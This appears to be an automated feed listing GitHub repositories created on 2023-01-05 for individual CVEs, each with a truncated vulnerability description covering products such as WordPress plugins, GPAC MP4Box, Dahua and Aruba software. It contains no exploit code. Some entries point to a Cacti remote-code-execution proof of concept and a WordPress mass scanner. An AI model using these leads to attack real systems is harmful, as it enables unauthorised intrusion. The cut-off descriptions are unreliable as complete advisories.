**The Swifty Page Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.0.1. This is due to missing or incorrect nonce validation on several AJAX actions handling page creation and deletion among other things. This makes it possible for unauthenticated attackers to i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0088](https://github.com/Live-Hack-CVE/CVE-2023-0088) create time: 2023-01-05T21:22:30Z

**The Swifty Page Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘spm_plugin_options_page_tree_max_width’ parameter in versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0087](https://github.com/Live-Hack-CVE/CVE-2023-0087) create time: 2023-01-05T21:22:26Z

**A buffer over-read vulnerability was reported in the ThinkPadX13s BIOS LenovoRemoteConfigUpdateDxe driver that could allow a local attacker with elevated privileges to cause information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4435](https://github.com/Live-Hack-CVE/CVE-2022-4435) create time: 2023-01-05T20:16:50Z

**A buffer over-read vulnerability was reported in the ThinkPadX13s BIOS driver that could allow a local attacker with elevated privileges to cause information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4434](https://github.com/Live-Hack-CVE/CVE-2022-4434) create time: 2023-01-05T20:16:45Z

**A buffer over-read vulnerability was reported in the ThinkPadX13s BIOS LenovoSetupConfigDxe driver that could allow a local attacker with elevated privileges to cause information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4433](https://github.com/Live-Hack-CVE/CVE-2022-4433) create time: 2023-01-05T20:16:40Z

**A buffer over-read vulnerability was reported in the ThinkPadX13s BIOS PersistenceConfigDxe driver that could allow a local attacker with elevated privileges to cause information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4432](https://github.com/Live-Hack-CVE/CVE-2022-4432) create time: 2023-01-05T20:16:35Z

**Discourse is an option source discussion platform. Prior to version 2.8.14 on the `stable` branch and version 2.9.0.beta15 on the `beta` and `tests-passed` branches, recipients of a group SMTP email could see the email addresses of all other users inside the group SMTP topic. Most of the time this is not an issue as th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46168](https://github.com/Live-Hack-CVE/CVE-2022-46168) create time: 2023-01-05T20:16:31Z

**IBM Robotic Process Automation for Cloud Pak 20.12 through 21.0.3 is vulnerable to broken access control. A user is not correctly redirected to the platform log out screen when logging out of IBM RPA for Cloud Pak. IBM X-Force ID: 239081. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43844](https://github.com/Live-Hack-CVE/CVE-2022-43844) create time: 2023-01-05T20:16:26Z

**IBM Robotic Process Automation 20.12 through 21.0.6 is vulnerable to exposure of the name and email for the creator/modifier of platform level objects. IBM X-Force ID: 238678. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43573](https://github.com/Live-Hack-CVE/CVE-2022-43573) create time: 2023-01-05T20:16:22Z

**IBM Robotic Process Automation 20.12 through 21.0.6 could allow an attacker with physical access to the system to obtain highly sensitive information from system memory. IBM X-Force ID: 238053. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41740](https://github.com/Live-Hack-CVE/CVE-2022-41740) create time: 2023-01-05T20:16:17Z

**A vulnerability was found in Graphite Web. It has been classified as problematic. Affected is an unknown function of the component Absolute Time Range Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4730](https://github.com/Live-Hack-CVE/CVE-2022-4730) create time: 2023-01-05T20:16:02Z

**Mass Scanner for CVE-2022-29455 on Elementor Plugins Wordpress** : [yaudahbanh/CVE-2022-29455](https://github.com/yaudahbanh/CVE-2022-29455) create time: 2023-01-05T18:29:47Z

**A vulnerability classified as critical was found in Miccighel PR-CWT. This vulnerability affects unknown code. The manipulation leads to sql injection. The name of the patch is e412127d07004668e5a213932c94807d87067a1f. It is recommended to apply a patch to fix this issue. VDB-217486 is the identifier assigned to this v CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125041](https://github.com/Live-Hack-CVE/CVE-2014-125041) create time: 2023-01-05T18:06:06Z

**An issue was discovered in Thunar before 4.16.7 and 4.17.x before 4.17.2. When called with a regular file as a command-line argument, it delegates to a different program (based on the file type) without user confirmation. This could be used to achieve code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32563](https://github.com/Live-Hack-CVE/CVE-2021-32563) create time: 2023-01-05T18:05:57Z

**A stack overflow flaw was found in the Linux kernel's SYSCTL subsystem in how a user changes certain kernel parameters and variables. This flaw allows a local user to crash or potentially escalate their privileges on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4378](https://github.com/Live-Hack-CVE/CVE-2022-4378) create time: 2023-01-05T18:05:51Z

**GPAC MP4box 2.1-DEV-rev649-ga8f438d20 is vulnerable to buffer overflow in h263dmx_process filters/reframe_h263.c:609 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47663](https://github.com/Live-Hack-CVE/CVE-2022-47663) create time: 2023-01-05T18:05:46Z

**GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 has a segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47662](https://github.com/Live-Hack-CVE/CVE-2022-47662) create time: 2023-01-05T18:05:42Z

**GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 is vulnerable to Buffer Overflow via media_tools/av_parsers.c:4988 in gf_media_nalu_add_emulation_bytes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47661](https://github.com/Live-Hack-CVE/CVE-2022-47661) create time: 2023-01-05T18:05:38Z

**GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is has an integer overflow in isomedia/isom_write.c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47660](https://github.com/Live-Hack-CVE/CVE-2022-47660) create time: 2023-01-05T18:05:33Z

**GPAC MP4box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to Buffer Overflow in gf_bs_read_data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47659](https://github.com/Live-Hack-CVE/CVE-2022-47659) create time: 2023-01-05T18:05:28Z

**GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function gf_hevc_read_vps_bs_internal of media_tools/av_parsers.c:8039 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47658](https://github.com/Live-Hack-CVE/CVE-2022-47658) create time: 2023-01-05T18:05:22Z

**GPAC MP4Box 2.1-DEV-rev644-g5c4df2a67 is vulnerable to buffer overflow in function hevc_parse_vps_extension of media_tools/av_parsers.c:7662 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47657](https://github.com/Live-Hack-CVE/CVE-2022-47657) create time: 2023-01-05T18:05:18Z

**GPAC MP4box 2.1-DEV-rev617-g85ce76efd is vulnerable to Buffer Overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8273 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47656](https://github.com/Live-Hack-CVE/CVE-2022-47656) create time: 2023-01-05T18:05:13Z

**Libde265 1.0.9 is vulnerable to Buffer Overflow in function void put_qpel_fallback CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47655](https://github.com/Live-Hack-CVE/CVE-2022-47655) create time: 2023-01-05T18:05:09Z

**GPAC MP4box 2.1-DEV-rev593-g007bf61a0 is vulnerable to Buffer Overflow in gf_hevc_read_sps_bs_internal function of media_tools/av_parsers.c:8261 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47654](https://github.com/Live-Hack-CVE/CVE-2022-47654) create time: 2023-01-05T18:05:04Z

**GPAC MP4box 2.1-DEV-rev593-g007bf61a0 is vulnerable to Buffer Overflow in eac3_update_channels function of media_tools/av_parsers.c:9113 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47653](https://github.com/Live-Hack-CVE/CVE-2022-47653) create time: 2023-01-05T18:04:59Z

**Cross-site Scripting (XSS) - Stored in GitHub repository openemr/openemr prior to 7.0.0.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4733](https://github.com/Live-Hack-CVE/CVE-2022-4733) create time: 2023-01-05T18:04:54Z

**no description** : [numanturle/CVE-2022-44877](https://github.com/numanturle/CVE-2022-44877) create time: 2023-01-05T17:29:10Z

**PoC for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22** : [sAsPeCt488/CVE-2022-46169-PoC](https://github.com/sAsPeCt488/CVE-2022-46169-PoC) create time: 2023-01-05T16:56:06Z

**A vulnerability was found in stevejagodzinski DevNewsAggregator. It has been rated as critical. Affected by this issue is the function getByName of the file php/data_access/RemoteHtmlContentDataAccess.php. The manipulation of the argument name leads to sql injection. The name of the patch is b9de907e7a8c9ca9d75295da675 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125040](https://github.com/Live-Hack-CVE/CVE-2014-125040) create time: 2023-01-05T15:53:53Z

**A vulnerability classified as critical has been found in arekk uke. This affects an unknown part of the file lib/uke/finder.rb. The manipulation leads to sql injection. The name of the patch is 52fd3b2d0bc16227ef57b7b98a3658bb67c1833f. It is recommended to apply a patch to fix this issue. The identifier VDB-217485 was CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10014](https://github.com/Live-Hack-CVE/CVE-2015-10014) create time: 2023-01-05T15:53:58Z

**A vulnerability in the ClearPass OnGuard macOS agent could allow malicious users on a macOS instance to elevate their user privileges. A successful exploit could allow these users to execute arbitrary code with root level privileges on the macOS instance in Aruba ClearPass Policy Manager version(s): ClearPass Policy Ma CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43533](https://github.com/Live-Hack-CVE/CVE-2022-43533) create time: 2023-01-05T15:54:30Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4695](https://github.com/Live-Hack-CVE/CVE-2022-4695) create time: 2023-01-05T15:54:18Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4694](https://github.com/Live-Hack-CVE/CVE-2022-4694) create time: 2023-01-05T15:54:13Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4691](https://github.com/Live-Hack-CVE/CVE-2022-4691) create time: 2023-01-05T15:54:08Z

**There is an unauthorized buffer overflow vulnerability in Tenda AX12 v22.03.01.21 _ cn. This vulnerability can cause the web service not to restart or even execute arbitrary code. It is a different vulnerability from CVE-2022-2414. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45995](https://github.com/Live-Hack-CVE/CVE-2022-45995) create time: 2023-01-05T15:54:02Z

**Open Redirect in GitHub repository ikus060/rdiffweb prior to 2.5.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4720](https://github.com/Live-Hack-CVE/CVE-2022-4720) create time: 2023-01-05T15:53:46Z

**Allocation of Resources Without Limits or Throttling in GitHub repository ikus060/rdiffweb prior to 2.5.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4723](https://github.com/Live-Hack-CVE/CVE-2022-4723) create time: 2023-01-05T15:53:41Z

**Authentication Bypass by Primary Weakness in GitHub repository ikus060/rdiffweb prior to 2.5.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4722](https://github.com/Live-Hack-CVE/CVE-2022-4722) create time: 2023-01-05T15:53:36Z

**Business Logic Errors in GitHub repository ikus060/rdiffweb prior to 2.5.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4719](https://github.com/Live-Hack-CVE/CVE-2022-4719) create time: 2023-01-05T15:53:32Z

**Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) in GitHub repository ikus060/rdiffweb prior to 2.5.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4721](https://github.com/Live-Hack-CVE/CVE-2022-4721) create time: 2023-01-05T15:53:27Z

**A vulnerability classified as problematic has been found in web-cyradm. This affects an unknown part of the file search.php. The manipulation of the argument searchstring leads to sql injection. It is recommended to apply a patch to fix this issue. The identifier VDB-217449 was assigned to this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-10001](https://github.com/Live-Hack-CVE/CVE-2007-10001) create time: 2023-01-05T13:43:07Z

**A vulnerability, which was classified as problematic, has been found in vercel ms up to 1.x. This issue affects the function parse of the file index.js. The manipulation of the argument str leads to inefficient regular expression complexity. The attack may be initiated remotely. The exploit has been disclosed to the pu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20162](https://github.com/Live-Hack-CVE/CVE-2017-20162) create time: 2023-01-05T13:43:12Z

**A vulnerability classified as problematic was found in gturri aXMLRPC up to 1.12.0. This vulnerability affects the function ResponseParser of the file src/main/java/de/timroes/axmlrpc/ResponseParser.java. The manipulation leads to xml external entity reference. Upgrading to version 1.12.1 is able to address this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36641](https://github.com/Live-Hack-CVE/CVE-2020-36641) create time: 2023-01-05T13:43:16Z

**A vulnerability was found in Woorank robots-txt-guard. It has been rated as problematic. Affected by this issue is the function makePathPattern of the file lib/patterns.js. The manipulation of the argument pattern leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4305](https://github.com/Live-Hack-CVE/CVE-2021-4305) create time: 2023-01-05T13:43:22Z

**A vulnerability was found in WebDevStudios taxonomy-switcher Plugin up to 1.0.3. It has been classified as problematic. Affected is the function taxonomy_switcher_init of the file taxonomy-switcher.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10013](https://github.com/Live-Hack-CVE/CVE-2015-10013) create time: 2023-01-05T11:31:34Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability classified as problematic was found in University of Cambridge django-ucamlookup up to 1.9.1. Affected by this vulnerability is an unknown functionality of the component Lookup Handler. The manipulation leads to cross site scripting. The at CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15010](https://github.com/Live-Hack-CVE/CVE-2016-15010) create time: 2023-01-05T11:32:09Z

**A vulnerability classified as problematic has been found in OpenACS bug-tracker. Affected is an unknown function of the file lib/nav-bar.adp of the component Search. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The name of the patch is aee43e5714cd8b697355ec3bf83ee CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15009](https://github.com/Live-Hack-CVE/CVE-2016-15009) create time: 2023-01-05T11:32:05Z

**A vulnerability was found in OSM Lab show-me-the-way. It has been rated as problematic. This issue affects some unknown processing of the file js/site.js. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 4bed3b34dcc01fe6661f39c0e5d2285b340f7cac. It is recomm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25064](https://github.com/Live-Hack-CVE/CVE-2018-25064) create time: 2023-01-05T11:32:14Z

**A vulnerability was found in Wikimedia mediawiki-extensions-I18nTags and classified as problematic. This issue affects some unknown processing of the file I18nTags_body.php of the component Unlike Parser. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is b4bc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-25065](https://github.com/Live-Hack-CVE/CVE-2018-25065) create time: 2023-01-05T11:31:39Z

**A vulnerability was found in soerennb eXtplorer up to 2.1.12. It has been classified as critical. This affects an unknown part of the file include/archive.php of the component Archive Handler. The manipulation leads to path traversal. Upgrading to version 2.1.13 is able to address this issue. The name of the patch is b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25098](https://github.com/Live-Hack-CVE/CVE-2019-25098) create time: 2023-01-05T11:32:50Z

**A vulnerability, which was classified as problematic, was found in kakwa LdapCherry up to 0.x. Affected is an unknown function of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.0.0 is able to address this issue. The name of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25095](https://github.com/Live-Hack-CVE/CVE-2019-25095) create time: 2023-01-05T11:32:46Z

**A vulnerability was found in soerennb eXtplorer up to 2.1.12 and classified as critical. Affected by this issue is some unknown functionality of the component Directory Content Handler. The manipulation leads to path traversal. Upgrading to version 2.1.13 is able to address this issue. The name of the patch is b8fcb888 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25097](https://github.com/Live-Hack-CVE/CVE-2019-25097) create time: 2023-01-05T11:32:33Z

**A vulnerability has been found in soerennb eXtplorer up to 2.1.12 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 2.1.13 is able to address this issue. The name of the pat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25096](https://github.com/Live-Hack-CVE/CVE-2019-25096) create time: 2023-01-05T11:32:28Z

**A vulnerability, which was classified as problematic, was found in bonitasoft bonita-connector-webservice up to 1.3.0. This affects the function TransformerConfigurationException of the file src/main/java/org/bonitasoft/connectors/ws/SecureWSConnector.java. The manipulation leads to xml external entity reference. Upgra CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36640](https://github.com/Live-Hack-CVE/CVE-2020-36640) create time: 2023-01-05T11:31:43Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25223](https://github.com/Live-Hack-CVE/CVE-2021-25223) create time: 2023-01-05T11:33:02Z

**** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate is unused by its CNA. Notes: none. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25222](https://github.com/Live-Hack-CVE/CVE-2021-25222) create time: 2023-01-05T11:32:58Z

**A vulnerability, which was classified as problematic, has been found in shannah Xataface up to 2.x. Affected by this issue is the function testftp of the file install/install_form.js.php of the component Installer. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4303](https://github.com/Live-Hack-CVE/CVE-2021-4303) create time: 2023-01-05T11:32:18Z

**A vulnerability was found in eprintsug ulcc-core. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file cgi/toolbox/toolbox. The manipulation of the argument password leads to command injection. The attack can be launched remotely. The name of the patch is 811edaae81eb CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4304](https://github.com/Live-Hack-CVE/CVE-2021-4304) create time: 2023-01-05T11:31:47Z

**A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim's bro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43532](https://github.com/Live-Hack-CVE/CVE-2022-43532) create time: 2023-01-05T11:33:19Z

**A vulnerability in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an remote attacker to persist a session after a password reset or similar session clearing event. Successful exploitation of this vulnerability could allow an authenticated attacker to remain on the system wit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43529](https://github.com/Live-Hack-CVE/CVE-2022-43529) create time: 2023-01-05T11:33:16Z

**Multiple vulnerabilities in the web-based management interface of Aruba EdgeConnect Enterprise Orchestrator could allow an authenticated remote attacker to conduct SQL injection attacks against the Aruba EdgeConnect Enterprise Orchestrator instance. An attacker could exploit these vulnerabilities to obtain and modify s CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43522](https://github.com/Live-Hack-CVE/CVE-2022-43522) create time: 2023-01-05T11:33:12Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.1 does not invalidate session after a password change which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 221195. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22371](https://github.com/Live-Hack-CVE/CVE-2022-22371) create time: 2023-01-05T11:33:07Z

**An incorrect user management vulnerability [CWE-286] in the FortiManager version 6.4.6 and below VDOM creation component may allow an attacker to access a FortiGate without a password via newly created VDOMs after the super_admin account is deleted. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45857](https://github.com/Live-Hack-CVE/CVE-2022-45857) create time: 2023-01-05T11:32:53Z

**Zoho ManageEngine Access Manager Plus before 4309, Password Manager Pro before 12210, and PAM360 before 5801 are vulnerable to SQL Injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47523](https://github.com/Live-Hack-CVE/CVE-2022-47523) create time: 2023-01-05T11:32:37Z

**A vulnerability was found in Evolution Events Artaxerxes. It has been declared as problematic. This vulnerability affects unknown code of the file arta/common/middleware.py of the component POST Parameter Handler. The manipulation of the argument password leads to information disclosure. The attack can be initiated rem CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4869](https://github.com/Live-Hack-CVE/CVE-2022-4869) create time: 2023-01-05T11:32:23Z

**A vulnerability has been found in snoyberg keter up to 1.8.1 and classified as problematic. This vulnerability affects unknown code of the file Keter/Proxy.hs. The manipulation of the argument host leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.8.2 is able to address this is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4877](https://github.com/Live-Hack-CVE/CVE-2022-4877) create time: 2023-01-05T11:31:56Z

**Improper neutralization of special elements in output used by a downstream component ('Injection') vulnerability in CGI component in Synology Router Manager (SRM) before 1.2.5-8227-6 and 1.3.1-9346-3 allows remote attackers to read arbitrary files via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43932](https://github.com/Live-Hack-CVE/CVE-2022-43932) create time: 2023-01-05T11:31:52Z

**PgHero before 3.1.0 allows Information Disclosure via EXPLAIN because query results may be present in an error message. (Depending on database user privileges, this may only be information from the database, or may be information from file contents on the database server.) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22626](https://github.com/Live-Hack-CVE/CVE-2023-22626) create time: 2023-01-05T11:32:41Z

**Integer overflow or wraparound vulnerability in CGI component in Synology Router Manager (SRM) before 1.2.5-8227-6 and 1.3.1-9346-3 allows remote attackers to overflow buffers via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0077](https://github.com/Live-Hack-CVE/CVE-2023-0077) create time: 2023-01-05T11:32:00Z

**Randomly-generated alphanumeric strings contain significantly less entropy than expected. The RandomAlphaNumeric and CryptoRandomAlphaNumeric functions always return strings containing at least one digit from 0 to 9. This significantly reduces the amount of entropy in short strings generated by these functions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4238](https://github.com/Live-Hack-CVE/CVE-2021-4238) create time: 2023-01-05T07:12:07Z

**Web Sockets do not execute any AuthenticateMethod methods which may be set, leading to a nil pointer dereference if the returned UserData pointer is assumed to be non-nil, or authentication bypass. This issue only affects WebSockets with an AuthenticateMethod hook. Request handlers that do not explicitly use WebSockets CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4236](https://github.com/Live-Hack-CVE/CVE-2021-4236) create time: 2023-01-05T07:11:42Z

**no description** : [nidhihcl/frameworks_base_AOSP_10_r33_CVE-2021-39696](https://github.com/nidhihcl/frameworks_base_AOSP_10_r33_CVE-2021-39696) create time: 2023-01-05T06:42:33Z

**Some Dahua software products have a vulnerability of unauthenticated un-throttled ICMP requests on remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could exploit the victim server to launch ICMP request attack to the des CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45434](https://github.com/Live-Hack-CVE/CVE-2022-45434) create time: 2023-01-05T07:12:58Z

**Some Dahua software products have a vulnerability of using of hard-coded cryptographic key. An attacker can obtain the AES crypto key by exploiting this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45425](https://github.com/Live-Hack-CVE/CVE-2022-45425) create time: 2023-01-05T07:12:53Z

**Some Dahua software products have a vulnerability of unauthenticated enable or disable SSHD service. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could enable or disable the SSHD service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45430](https://github.com/Live-Hack-CVE/CVE-2022-45430) create time: 2023-01-05T07:12:49Z

**Some Dahua software products have a vulnerability of unauthenticated search for devices. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated search for devices in range of IPs from remote DSS Server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45432](https://github.com/Live-Hack-CVE/CVE-2022-45432) create time: 2023-01-05T07:12:45Z

**Some Dahua software products have a vulnerability of unauthenticated restart of remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could unauthenticated restart of remote DSS Server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45431](https://github.com/Live-Hack-CVE/CVE-2022-45431) create time: 2023-01-05T07:12:41Z

**Some Dahua software products have a vulnerability of unrestricted upload of file. After obtaining the permissions of administrators, by sending a specific crafted packet to the vulnerable interface, an attacker can upload arbitrary files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45427](https://github.com/Live-Hack-CVE/CVE-2022-45427) create time: 2023-01-05T07:12:37Z

**Some Dahua software products have a vulnerability of sensitive information leakage. After obtaining the permissions of administrators, by sending a specific crafted packet to the vulnerable interface, an attacker can obtain the debugging information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45428](https://github.com/Live-Hack-CVE/CVE-2022-45428) create time: 2023-01-05T07:12:33Z

**Some Dahua software products have a vulnerability of unauthenticated request of AES crypto key. An attacker can obtain the AES crypto key by sending a specific crafted packet to the vulnerable interface. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45424](https://github.com/Live-Hack-CVE/CVE-2022-45424) create time: 2023-01-05T07:12:29Z

**Some Dahua software products have a vulnerability of unauthenticated traceroute host from remote DSS Server. After bypassing the firewall access control policy, by sending a specific crafted packet to the vulnerable interface, an attacker could get the traceroute results. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45433](https://github.com/Live-Hack-CVE/CVE-2022-45433) create time: 2023-01-05T07:12:24Z

**Some Dahua software products have a vulnerability of server-side request forgery (SSRF). An Attacker can access internal resources by concatenating links (URL) that conform to specific rules. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45429](https://github.com/Live-Hack-CVE/CVE-2022-45429) create time: 2023-01-05T07:12:20Z

**A race condition can cause incorrect HTTP request routing. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2583](https://github.com/Live-Hack-CVE/CVE-2022-2583) create time: 2023-01-05T07:12:15Z

**The AWS S3 Crypto SDK sends an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext, if the hash is readable to the attacker. AWS now blocks this metadata field, but older SDK versions still send it. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2582](https://github.com/Live-Hack-CVE/CVE-2022-2582) create time: 2023-01-05T07:12:11Z

**MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.1 allow users to upload a file, but do not validate the file name, which may lead to upload file to any path. The vulnerability has been fixed in v2.5 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46178](https://github.com/Live-Hack-CVE/CVE-2022-46178) create time: 2023-01-05T07:12:02Z

**SourceCodester Sanitization Management System 1.0 is vulnerable to SQL Injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44137](https://github.com/Live-Hack-CVE/CVE-2022-44137) create time: 2023-01-05T07:11:57Z

**Some Dahua software products have a vulnerability of unauthenticated request of MQTT credentials. An attacker can obtain encrypted MQTT credentials by sending a specific crafted packet to the vulnerable interface (the credentials cannot be directly exploited). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45423](https://github.com/Live-Hack-CVE/CVE-2022-45423) create time: 2023-01-05T07:11:51Z

**https://www.hillstonenet.com.cn/ Hillstone Firewall SG-6000 <= 5.0.4.0 is vulnerable to Incorrect Access Control. There is a permission bypass vulnerability in the Hillstone WEB application firewall. An attacker can enter the background of the firewall with super administrator privileges through a configuration error i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45778](https://github.com/Live-Hack-CVE/CVE-2022-45778) create time: 2023-01-05T07:11:47Z

**MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdI CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23544](https://github.com/Live-Hack-CVE/CVE-2022-23544) create time: 2023-01-05T07:11:33Z

